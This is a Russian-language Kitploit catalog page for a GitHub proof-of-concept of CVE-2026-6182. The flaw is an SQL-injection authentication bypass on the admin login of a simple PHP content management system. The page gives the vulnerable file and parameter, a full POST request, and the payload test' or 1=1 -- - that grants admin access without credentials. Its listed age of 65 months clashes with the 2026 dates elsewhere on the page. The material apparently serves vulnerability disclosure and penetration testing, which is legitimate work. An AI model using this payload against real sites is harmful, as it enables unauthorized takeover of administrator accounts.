Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-6182-SQLI-auth — Proof-of-concept для обхода аутентификации через SQL-инъекцию в Simple Content Management System PHP, позволяющий неаутентифицированным злоумышленникам получить доступ администратора с помощью специально сформированного параметра user. | Kitploit
Инструменты/GitHubGitHub/xmyronn/cve-2026-6182-sqli-auth
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификация
GitHubxmyronn/cve-2026-6182-sqli-auth

CVE-2026-6182-SQLI-auth

Proof-of-concept для обхода аутентификации через SQL-инъекцию в Simple Content Management System PHP, позволяющий неаутентифицированным злоумышленникам получить доступ администратора с помощью специально сформированного параметра user.

Репозиторий
65 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Обход аутентификации через SQL-инъекцию — Простая система управления контентом на PHP

Описание

Уязвимость SQL-инъекции существует на странице входа в админ-панель простой системы управления контентом на PHP. Параметр user не подвергается санитизации перед передачей в SQL-запрос, что позволяет неаутентифицированному злоумышленнику обойти аутентификацию и получить полный доступ к админ-панели.


Детали уязвимости

  • Тип: SQL-инъекция (CWE-89)
  • Воздействие: Обход аутентификации — мы получаем полный доступ к админ-панели
  • Затронутый файл: /web/admin/login.php
  • Затронутый параметр: user
  • Вектор атаки: Удалённый, без аутентификации **Серьёзность: Критическая

Вендор

code-projects.org

Продукт

Простая система управления контентом на PHP

Версия

1.0


Доказательство концепции (PoC)

Шаг 1 — Отправьте следующий запрос в Burp:

root@kitploit:~
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded

user=test'+or+1%3D1+--+-&password=test&submit=Login

или просто добавьте это на страницу входа Screenshot 2026-04-05 051755

Шаг 2 — Форма входа с полезной нагрузкой:

test' or 1=1 -- -

Шаг 3 — Доступ к админ-панели предоставлен:

Screenshot 2026-04-05 054510

Воздействие

Неаутентифицированный удалённый злоумышленник может полностью обойти вход в админ-панель, не зная никаких учётных данных, получив полный контроль над админ-панелью, включая добавление контента.


Автор

Imad Alvi


Ссылка

https://code-projects.org/simple-content-management-system-in-php-with-source-code/

Скачать инструмент